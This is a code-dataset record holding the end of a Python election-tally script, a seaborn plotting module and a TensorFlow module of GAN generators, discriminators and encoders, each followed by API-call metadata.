LiPer = round(((totalLi) / (totalVotes) *100))
#calculate O'Tooley's vote precentage
totalO_Tooley = len(O_Tooley)
O_TooleyPer = round(((totalO_Tooley) / (totalVotes) *100))
#calculate popular vote winner
if (totalKhan) > (totalCorrey) and (totalLi) and (totalO_Tooley):
winner = "Khan"
elif (totalCorrey) > (totalKhan) and (totalLi) and (totalO_Tooley):
winner = "Correy"
elif (totalLi) > (totalKhan) and (totalCorrey) and (totalO_Tooley):
winner = "Li"
else:
winner = "O'Tooley"
#print to terminal
print("Election Results")
print("-------------------------")
print(f'Total Votes: {totalVotes}')
print("-------------------------")
print(f'Khan: {KhanPer}% ({totalKhan})')
print(f'Correy: {CorreyPer}% ({totalCorrey})')
print(f'Li: {LiPer}% ({totalLi})')
print(f"O'Tooley: {O_TooleyPer}% ({totalO_Tooley})")
print("-------------------------")
print(f'Winner: {winner}')
print("-------------------------")
#print to file
f = open ("Election_Results.txt", "a")
print("Election Results", file=f)
print("-------------------------", file=f)
print(f'Total Votes: {totalVotes}', file=f)
print("-------------------------", file=f)
print(f'Khan: {KhanPer}% ({totalKhan})', file=f)
print(f'Correy: {CorreyPer}% ({totalCorrey})', file=f)
print(f'Li: {LiPer}% ({totalLi})', file=f)
print(f"O'Tooley: {O_TooleyPer}% ({totalO_Tooley})", file=f)
print("-------------------------", file=f)
print(f'Winner: {winner}', file=f)
print("-------------------------", file=f)
f.close()
|
[
"csv.reader",
"os.path.join"
] |
[((110, 156), 'os.path.join', 'os.path.join', (['"""Resources"""', '"""election_data.csv"""'], {}), "('Resources', 'election_data.csv')\n", (122, 156), False, 'import os\n'), ((246, 280), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (256, 280), False, 'import csv\n')]
|
import seaborn as sns
import pandas as pd
import numpy as np
import matplotlib.markers as mk
import matplotlib.pylab as plt
def sp_plot(df, x_col, y_col, color_col,ci = None,domain_range=[0, 20, 0 , 20],
ax=None,aggplot=True,x_jitter=0,height=3,legend=True):
"""
create SP vizualization plot from 2 columns of a df
"""
# # create axes if not passed
# if ax is None:
# fig = plt.figure()
# ax = fig.add_subplot(111)
all_markers = list(mk.MarkerStyle.markers.keys())
n_markers = df[color_col].unique().shape[0] # number unique
cur_markers = all_markers[:n_markers]
sns.lmplot(x_col, y_col, data=df, hue=color_col, ci=ci,
markers =cur_markers, palette="Set1",x_jitter=x_jitter,
height=height,legend=legend)
if aggplot:
# adda whole data regression line, but don't cover the scatter data
sns.regplot(x_col, y_col, data=df, color='black', scatter=False, ci=ci,)
plt.axis(domain_range)
def plot_clustermat(z,fmt=None):
"""
black and white matshow for clustering and feat allocation matrices
Parameters
-----------
z : nparray, square to be plotted
fmt : if z is not a square, then str of what it is
fmt options:
'crplist' : a list of values from zero to k
'ibplist' : a list of lists of varying lengths
'list' : a list, but not nparray otherwise ready to plot
"""
processing = {'crplist': lambda x: list_to_mat(x),
'ibplist': lambda x: make_square(x),
'list': lambda x: np.asarray(x),
None: lambda x: x}
z_mat = processing[fmt](z)
# print(z_mat)
N,K = z_mat.shape
# no white grid
sns.set_style("whitegrid", {'axes.grid' : False})
# plot the data
plt.matshow(z_mat,cmap=plt.cm.gray_r)
# make the tick marks at the ints
ax = plt.gca()
ax.set_xticks(np.arange(0, K, 1))
ax.set_yticks(np.arange(0, N, 1))
# Labels for major ticks
ax.set_xticklabels(np.arange(0, K, 1))
ax.set_yticklabels(np.arange(0, N, 1))
# Minor ticks at 1/2 marks
ax.set_xticks(np.arange(-.5, K, 1), minor=True)
ax.set_yticks(np.arange(-.5, N, 1), minor=True)
# Gridlines based on minor ticks
plt.grid(which='minor', color='k', linestyle='-', linewidth=3)
def make_square(z):
"""
convert a list of lists of varying sizes to a square matrix
"""
D = len(z[-1])
return np.asarray([np.concatenate((z_i,np.zeros([D-len(z_i)]))) for z_i in z])
def list_to_mat(z):
"""
make a list of length N with values 1 to K into an NxK binanry matrix
"""
K = np.max(z)
tmp = np.eye(K+1)
return np.asarray([tmp[z_i] for z_i in z])
|
[
"seaborn.set_style",
"seaborn.lmplot",
"matplotlib.markers.MarkerStyle.markers.keys",
"numpy.asarray",
"matplotlib.pylab.axis",
"matplotlib.pylab.gca",
"seaborn.regplot",
"numpy.max",
"numpy.arange",
"numpy.eye",
"matplotlib.pylab.grid",
"matplotlib.pylab.matshow"
] |
[((636, 781), 'seaborn.lmplot', 'sns.lmplot', (['x_col', 'y_col'], {'data': 'df', 'hue': 'color_col', 'ci': 'ci', 'markers': 'cur_markers', 'palette': '"""Set1"""', 'x_jitter': 'x_jitter', 'height': 'height', 'legend': 'legend'}), "(x_col, y_col, data=df, hue=color_col, ci=ci, markers=cur_markers,\n palette='Set1', x_jitter=x_jitter, height=height, legend=legend)\n", (646, 781), True, 'import seaborn as sns\n'), ((993, 1015), 'matplotlib.pylab.axis', 'plt.axis', (['domain_range'], {}), '(domain_range)\n', (1001, 1015), True, 'import matplotlib.pylab as plt\n'), ((1742, 1790), 'seaborn.set_style', 'sns.set_style', (['"""whitegrid"""', "{'axes.grid': False}"], {}), "('whitegrid', {'axes.grid': False})\n", (1755, 1790), True, 'import seaborn as sns\n'), ((1817, 1855), 'matplotlib.pylab.matshow', 'plt.matshow', (['z_mat'], {'cmap': 'plt.cm.gray_r'}), '(z_mat, cmap=plt.cm.gray_r)\n', (1828, 1855), True, 'import matplotlib.pylab as plt\n'), ((1904, 1913), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (1911, 1913), True, 'import matplotlib.pylab as plt\n'), ((2284, 2346), 'matplotlib.pylab.grid', 'plt.grid', ([], {'which': '"""minor"""', 'color': '"""k"""', 'linestyle': '"""-"""', 'linewidth': '(3)'}), "(which='minor', color='k', linestyle='-', linewidth=3)\n", (2292, 2346), True, 'import matplotlib.pylab as plt\n'), ((2669, 2678), 'numpy.max', 'np.max', (['z'], {}), '(z)\n', (2675, 2678), True, 'import numpy as np\n'), ((2689, 2702), 'numpy.eye', 'np.eye', (['(K + 1)'], {}), '(K + 1)\n', (2695, 2702), True, 'import numpy as np\n'), ((2712, 2747), 'numpy.asarray', 'np.asarray', (['[tmp[z_i] for z_i in z]'], {}), '([tmp[z_i] for z_i in z])\n', (2722, 2747), True, 'import numpy as np\n'), ((490, 519), 'matplotlib.markers.MarkerStyle.markers.keys', 'mk.MarkerStyle.markers.keys', ([], {}), '()\n', (517, 519), True, 'import matplotlib.markers as mk\n'), ((915, 986), 'seaborn.regplot', 'sns.regplot', (['x_col', 'y_col'], {'data': 'df', 'color': '"""black"""', 'scatter': '(False)', 'ci': 'ci'}), "(x_col, y_col, data=df, color='black', scatter=False, ci=ci)\n", (926, 986), True, 'import seaborn as sns\n'), ((1932, 1950), 'numpy.arange', 'np.arange', (['(0)', 'K', '(1)'], {}), '(0, K, 1)\n', (1941, 1950), True, 'import numpy as np\n'), ((1970, 1988), 'numpy.arange', 'np.arange', (['(0)', 'N', '(1)'], {}), '(0, N, 1)\n', (1979, 1988), True, 'import numpy as np\n'), ((2043, 2061), 'numpy.arange', 'np.arange', (['(0)', 'K', '(1)'], {}), '(0, K, 1)\n', (2052, 2061), True, 'import numpy as np\n'), ((2086, 2104), 'numpy.arange', 'np.arange', (['(0)', 'N', '(1)'], {}), '(0, N, 1)\n', (2095, 2104), True, 'import numpy as np\n'), ((2156, 2177), 'numpy.arange', 'np.arange', (['(-0.5)', 'K', '(1)'], {}), '(-0.5, K, 1)\n', (2165, 2177), True, 'import numpy as np\n'), ((2208, 2229), 'numpy.arange', 'np.arange', (['(-0.5)', 'N', '(1)'], {}), '(-0.5, N, 1)\n', (2217, 2229), True, 'import numpy as np\n'), ((1592, 1605), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (1602, 1605), True, 'import numpy as np\n')]
|
import tensorflow as tf
from tflib.layers import *
def mnist_generator(z, is_training=True):
net_dim = 64
use_sn = False
update_collection = None
with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
output = linear(z, 4*4*4*net_dim, sn=use_sn, name='linear')
output = batch_norm(output, is_training=is_training, name='bn_linear')
output = tf.nn.relu(output)
output = tf.reshape(output, [-1, 4, 4, 4*net_dim])
# deconv-bn-relu
output = deconv2d(output, 2*net_dim, 5, 2, sn=use_sn, name='deconv_0')
output = batch_norm(output, is_training=is_training, name='bn_0')
output = tf.nn.relu(output)
output = output[:, :7, :7, :]
output = deconv2d(output, net_dim, 5, 2, sn=use_sn, name='deconv_1')
output = batch_norm(output, is_training=is_training, name='bn_1')
output = tf.nn.relu(output)
output = deconv2d(output, 1, 5, 2, sn=use_sn, name='deconv_2')
output = tf.sigmoid(output)
return output
def mnist_discriminator(x, update_collection=None, is_training=False):
net_dim = 64
use_sn = True
with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
# block 1
x = conv2d(x, net_dim, 5, 2, sn=use_sn, update_collection=update_collection, name='conv0')
x = lrelu(x)
# block 2
x = conv2d(x, 2 * net_dim, 5, 2, sn=use_sn, update_collection=update_collection, name='conv1')
x = lrelu(x)
# block 3
x = conv2d(x, 4 * net_dim, 5, 2, sn=use_sn, update_collection=update_collection, name='conv2')
x = lrelu(x)
# output
x = tf.reshape(x, [-1, 4 * 4 * 4 * net_dim])
x = linear(x, 1, sn=use_sn, update_collection=update_collection, name='linear')
return tf.reshape(x, [-1])
def mnist_encoder(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
x = conv2d(x, net_dim, 5, 2, name='conv0')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn0')
x = tf.nn.relu(x)
x = conv2d(x, 2*net_dim, 5, 2, name='conv1')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn1')
x = tf.nn.relu(x)
x = conv2d(x, 4*net_dim, 5, 2, name='conv2')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn2')
x = tf.nn.relu(x)
x = tf.reshape(x, [-1, 4 * 4 * 4 * net_dim])
x = linear(x, 2*latent_dim, name='linear')
return x[:, :latent_dim], x[:, latent_dim:]
def cifar10_generator_resnet(z, is_training=False):
with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
output = linear(z, 4 * 4 * 256, name='linear_0')
output = tf.reshape(output, [-1, 4, 4, 256])
output = resblock_up(output, 256, is_training=is_training, name='block_0')
output = resblock_up(output, 256, is_training=is_training, name='block_1')
output = resblock_up(output, 256, is_training=is_training, name='block_2')
# output layers
output = batch_norm(output, is_training=is_training, name='g_bn')
output = tf.nn.relu(output)
output = conv2d(output, 3, 3, 1, name='conv_last')
output = tf.tanh(output)
return output
def cifar10_discriminator_resnet(x, update_collection=None, is_training=False):
with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
output = inblock(x, 128, sn=True, update_collection=update_collection, name='block_0') # 16 x 16
output = resblock_down(output, 128, sn=True, update_collection=update_collection, name='block_1') # 8 x 8
output = resblock_down(output, 128, sn=True, update_collection=update_collection, downsample=False, name='block_2')
output = resblock_down(output, 128, sn=True, update_collection=update_collection, downsample=False, name='block_3')
# output layers
output = tf.nn.relu(output)
output = tf.reduce_sum(output, [1, 2])
output = linear(output, 1, sn=True, update_collection=update_collection, name='linear')
return tf.reshape(output, [-1])
def cifar10_generator(z, is_training=False):
net_dim = 64
use_sn = False
update_collection = None
with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
output = linear(z, 4*4*8*net_dim, sn=use_sn, name='linear')
output = batch_norm(output, is_training=is_training, name='bn_linear')
output = tf.nn.relu(output)
output = tf.reshape(output, [-1, 4, 4, 8*net_dim])
# deconv-bn-relu
for i in range(3):
output = deconv2d(output, 2**(2-i)*net_dim, sn=use_sn, name='deconv_' + str(i))
output = batch_norm(output, is_training=is_training, name='bn_' + str(i))
output = tf.nn.relu(output)
# conv
output = conv2d(output, 3, sn=use_sn, name='conv3')
output = tf.tanh(output)
return output
def cifar10_discriminator(x, update_collection=None, is_training=False):
net_dim = 64
use_sn = True
with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
# block 1
x = conv2d(x, net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv0')
x = lrelu(x)
x = conv2d(x, net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv1')
x = lrelu(x)
# block 2
x = conv2d(x, 2*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv2')
x = lrelu(x)
x = conv2d(x, 2*net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv3')
x = lrelu(x)
# block 3
x = conv2d(x, 4*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv4')
x = lrelu(x)
x = conv2d(x, 4*net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv5')
x = lrelu(x)
# output
x = conv2d(x, 8*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv6')
x = tf.reshape(x, [-1, 4*4*8*net_dim])
x = linear(x, 1, sn=use_sn, update_collection=update_collection, name='linear')
return tf.reshape(x, [-1])
def cifar10_encoder(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
x = conv2d(x, net_dim, 3, 1, name='conv0')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn0')
x = tf.nn.relu(x)
x = conv2d(x, 2*net_dim, 4, 2, name='conv1')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn1')
x = tf.nn.relu(x)
x = conv2d(x, 4*net_dim, 4, 2, name='conv2')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn2')
x = tf.nn.relu(x)
x = conv2d(x, 8*net_dim, 4, 2, name='conv3')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn3')
x = tf.nn.relu(x)
x = tf.reshape(x, [-1, 4 * 4 * 8 * net_dim])
x = linear(x, 2*latent_dim, name='linear')
return x[:, :latent_dim], x[:, latent_dim:]
def cifar10_encoder_resnet(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
output = inblock(x, 128, sn=False, name='block_0') # 16 x 16
output = resblock_down(output, 128, sn=False, name='block_1') # 8 x 8
output = resblock_down(output, 128, sn=False, downsample=False, name='block_2')
output = resblock_down(output, 128, sn=False, downsample=False, name='block_3')
# output layers
output = tf.nn.relu(output)
output = tf.reduce_sum(output, [1, 2])
output = linear(output, 2*latent_dim, sn=False, name='linear')
return output[:, :latent_dim], output[:, latent_dim:]
def celeba_generator(z, is_training=True):
net_dim = 64
use_sn = False
update_collection = None
with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
output = linear(z, 4 * 4 * 8 * net_dim, sn=use_sn, name='linear')
output = batch_norm(output, is_training=is_training, name='bn_linear')
output = tf.reshape(output, [-1, 4, 4, 8 * net_dim])
# deconv-bn-relu
for i in range(3):
output = deconv2d(output, 2 ** (2 - i) * net_dim, sn=use_sn, name='deconv_' + str(i))
output = batch_norm(output, is_training=is_training, name='bn_' + str(i))
output = tf.nn.relu(output)
# conv
output = deconv2d(output, 3, sn=use_sn, name='deconv_out')
output = tf.tanh(output)
return output
def celeba_generator_resnet(z, is_training=False):
with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
output = linear(z, 4 * 4 * 256, name='linear_0')
output = tf.reshape(output, [-1, 4, 4, 256])
output = resblock_up(output, 256, is_training=is_training, name='block_0')
output = resblock_up(output, 256, is_training=is_training, name='block_1')
output = resblock_up(output, 256, is_training=is_training, name='block_2')
output = resblock_up(output, 256, is_training=is_training, name='block_3')
# output layers
output = batch_norm(output, is_training=is_training, name='g_bn')
output = tf.nn.relu(output)
output = conv2d(output, 3, 3, 1, name='conv_last')
output = tf.tanh(output)
return output
def celeba_discriminator(x, update_collection=None, is_training=False):
net_dim = 64
use_sn = True
with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
# block 1
x = conv2d(x, net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv0')
x = lrelu(x)
x = conv2d(x, net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv1')
x = lrelu(x)
# block 2
x = conv2d(x, 2*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv2')
x = lrelu(x)
x = conv2d(x, 2*net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv3')
x = lrelu(x)
# block 3
x = conv2d(x, 4*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv4')
x = lrelu(x)
x = conv2d(x, 4*net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv5')
x = lrelu(x)
# block 4
x = conv2d(x, 4*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='conv6')
x = lrelu(x)
x = conv2d(x, 4*net_dim, 4, 2, sn=use_sn, update_collection=update_collection, name='conv7')
x = lrelu(x)
# output
x = conv2d(x, 8*net_dim, 3, 1, sn=use_sn, update_collection=update_collection, name='output')
x = tf.reshape(x, [-1, 4*4*8*net_dim])
x = linear(x, 1, sn=use_sn, update_collection=update_collection, name='linear')
return tf.reshape(x, [-1])
def celeba_discriminator_resnet(x, update_collection=None, is_training=False):
with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
output = inblock(x, 128, sn=True, update_collection=update_collection, name='block_0') # 16 x 16
output = resblock_down(output, 128, sn=True, update_collection=update_collection, name='block_1') # 8 x 8
output = resblock_down(output, 128, sn=True, update_collection=update_collection, downsample=False, name='block_2')
output = resblock_down(output, 128, sn=True, update_collection=update_collection, downsample=False, name='block_3')
output = resblock_down(output, 128, sn=True, update_collection=update_collection, downsample=False, name='block_4')
# output layers
output = tf.nn.relu(output)
output = tf.reduce_sum(output, [1, 2])
output = linear(output, 1, sn=True, update_collection=update_collection, name='linear')
return tf.reshape(output, [-1])
def celeba_encoder(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
x = conv2d(x, net_dim, 3, 1, name='conv0')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn0')
x = tf.nn.relu(x)
x = conv2d(x, 2*net_dim, 4, 2, name='conv1')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn1')
x = tf.nn.relu(x)
x = conv2d(x, 4*net_dim, 4, 2, name='conv2')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn2')
x = tf.nn.relu(x)
x = conv2d(x, 8*net_dim, 4, 2, name='conv3')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn3')
x = tf.nn.relu(x)
x = conv2d(x, 8*net_dim, 4, 2, name='conv4')
if use_bn:
x = batch_norm(x, is_training=is_training, name='bn3')
x = tf.nn.relu(x)
x = tf.reshape(x, [-1, 4 * 4 * 8 * net_dim])
x = linear(x, 2*latent_dim, name='linear')
return x[:, :latent_dim], x[:, latent_dim:]
def celeba_encoder_resnet(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
output = inblock(x, 128, sn=False, name='block_0') # 16 x 16
output = resblock_down(output, 128, sn=False, name='block_1') # 8 x 8
output = resblock_down(output, 128, sn=False, downsample=False, name='block_2')
output = resblock_down(output, 128, sn=False, downsample=False, name='block_3')
output = resblock_down(output, 128, sn=False, downsample=False, name='block_4')
# output layers
output = tf.nn.relu(output)
output = tf.reduce_sum(output, [1, 2])
output = linear(output, 2*latent_dim, sn=False, name='linear')
return output[:, :latent_dim], output[:, latent_dim:]
GENERATOR_DICT = {'mnist': [mnist_generator, mnist_generator],
'f-mnist': [mnist_generator, mnist_generator],
'cifar-10': [cifar10_generator, cifar10_generator_resnet],
'celeba': [celeba_generator, celeba_generator_resnet]}
DISCRIMINATOR_DICT = {'mnist': [mnist_discriminator, mnist_discriminator],
'f-mnist': [mnist_discriminator, mnist_discriminator],
'cifar-10': [cifar10_discriminator, cifar10_discriminator_resnet],
'celeba': [celeba_discriminator, celeba_discriminator_resnet]}
ENCODER_DICT = {'mnist': [mnist_encoder, mnist_encoder],
'f-mnist': [mnist_encoder, mnist_encoder],
'cifar-10': [cifar10_encoder, cifar10_encoder_resnet],
'celeba': [celeba_encoder, celeba_encoder_resnet]
}
def get_generator_fn(dataset_name, use_resblock=False):
if use_resblock:
return GENERATOR_DICT[dataset_name][1]
else:
return GENERATOR_DICT[dataset_name][0]
def get_discriminator_fn(dataset_name, use_resblock=False, use_label=False):
if use_resblock:
return DISCRIMINATOR_DICT[dataset_name][1]
else:
return DISCRIMINATOR_DICT[dataset_name][0]
def get_encoder_fn(dataset_name, use_resblock=False):
if use_resblock:
return ENCODER_DICT[dataset_name][1]
else:
return ENCODER_DICT[dataset_name][0]
|
[
"tensorflow.nn.relu",
"tensorflow.reduce_sum",
"tensorflow.reshape",
"tensorflow.variable_scope",
"tensorflow.tanh",
"tensorflow.sigmoid"
] |
[((169, 220), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (186, 220), True, 'import tensorflow as tf\n'), ((386, 404), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (396, 404), True, 'import tensorflow as tf\n'), ((422, 465), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 4 * net_dim]'], {}), '(output, [-1, 4, 4, 4 * net_dim])\n', (432, 465), True, 'import tensorflow as tf\n'), ((668, 686), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (678, 686), True, 'import tensorflow as tf\n'), ((895, 913), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (905, 913), True, 'import tensorflow as tf\n'), ((1003, 1021), 'tensorflow.sigmoid', 'tf.sigmoid', (['output'], {}), '(output)\n', (1013, 1021), True, 'import tensorflow as tf\n'), ((1162, 1217), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (1179, 1217), True, 'import tensorflow as tf\n'), ((1670, 1710), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 4 * net_dim]'], {}), '(x, [-1, 4 * 4 * 4 * net_dim])\n', (1680, 1710), True, 'import tensorflow as tf\n'), ((1814, 1833), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1]'], {}), '(x, [-1])\n', (1824, 1833), True, 'import tensorflow as tf\n'), ((1928, 1977), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (1945, 1977), True, 'import tensorflow as tf\n'), ((2128, 2141), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (2138, 2141), True, 'import tensorflow as tf\n'), ((2294, 2307), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (2304, 2307), True, 'import tensorflow as tf\n'), ((2460, 2473), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (2470, 2473), True, 'import tensorflow as tf\n'), ((2487, 2527), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 4 * net_dim]'], {}), '(x, [-1, 4 * 4 * 4 * net_dim])\n', (2497, 2527), True, 'import tensorflow as tf\n'), ((2695, 2746), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (2712, 2746), True, 'import tensorflow as tf\n'), ((2822, 2857), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 256]'], {}), '(output, [-1, 4, 4, 256])\n', (2832, 2857), True, 'import tensorflow as tf\n'), ((3223, 3241), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (3233, 3241), True, 'import tensorflow as tf\n'), ((3318, 3333), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (3325, 3333), True, 'import tensorflow as tf\n'), ((3448, 3503), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (3465, 3503), True, 'import tensorflow as tf\n'), ((4014, 4032), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (4024, 4032), True, 'import tensorflow as tf\n'), ((4050, 4079), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (4063, 4079), True, 'import tensorflow as tf\n'), ((4192, 4216), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1]'], {}), '(output, [-1])\n', (4202, 4216), True, 'import tensorflow as tf\n'), ((4338, 4389), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (4355, 4389), True, 'import tensorflow as tf\n'), ((4555, 4573), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (4565, 4573), True, 'import tensorflow as tf\n'), ((4591, 4634), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 8 * net_dim]'], {}), '(output, [-1, 4, 4, 8 * net_dim])\n', (4601, 4634), True, 'import tensorflow as tf\n'), ((4996, 5011), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (5003, 5011), True, 'import tensorflow as tf\n'), ((5154, 5209), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (5171, 5209), True, 'import tensorflow as tf\n'), ((6123, 6163), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (6133, 6163), True, 'import tensorflow as tf\n'), ((6261, 6280), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1]'], {}), '(x, [-1])\n', (6271, 6280), True, 'import tensorflow as tf\n'), ((6377, 6426), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (6394, 6426), True, 'import tensorflow as tf\n'), ((6577, 6590), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (6587, 6590), True, 'import tensorflow as tf\n'), ((6743, 6756), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (6753, 6756), True, 'import tensorflow as tf\n'), ((6909, 6922), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (6919, 6922), True, 'import tensorflow as tf\n'), ((7075, 7088), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (7085, 7088), True, 'import tensorflow as tf\n'), ((7102, 7142), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (7112, 7142), True, 'import tensorflow as tf\n'), ((7350, 7399), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (7367, 7399), True, 'import tensorflow as tf\n'), ((7766, 7784), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (7776, 7784), True, 'import tensorflow as tf\n'), ((7802, 7831), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (7815, 7831), True, 'import tensorflow as tf\n'), ((8085, 8136), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (8102, 8136), True, 'import tensorflow as tf\n'), ((8308, 8351), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 8 * net_dim]'], {}), '(output, [-1, 4, 4, 8 * net_dim])\n', (8318, 8351), True, 'import tensorflow as tf\n'), ((8728, 8743), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (8735, 8743), True, 'import tensorflow as tf\n'), ((8828, 8879), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (8845, 8879), True, 'import tensorflow as tf\n'), ((8955, 8990), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 256]'], {}), '(output, [-1, 4, 4, 256])\n', (8965, 8990), True, 'import tensorflow as tf\n'), ((9439, 9457), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (9449, 9457), True, 'import tensorflow as tf\n'), ((9534, 9549), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (9541, 9549), True, 'import tensorflow as tf\n'), ((9691, 9746), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (9708, 9746), True, 'import tensorflow as tf\n'), ((10923, 10963), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (10933, 10963), True, 'import tensorflow as tf\n'), ((11061, 11080), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1]'], {}), 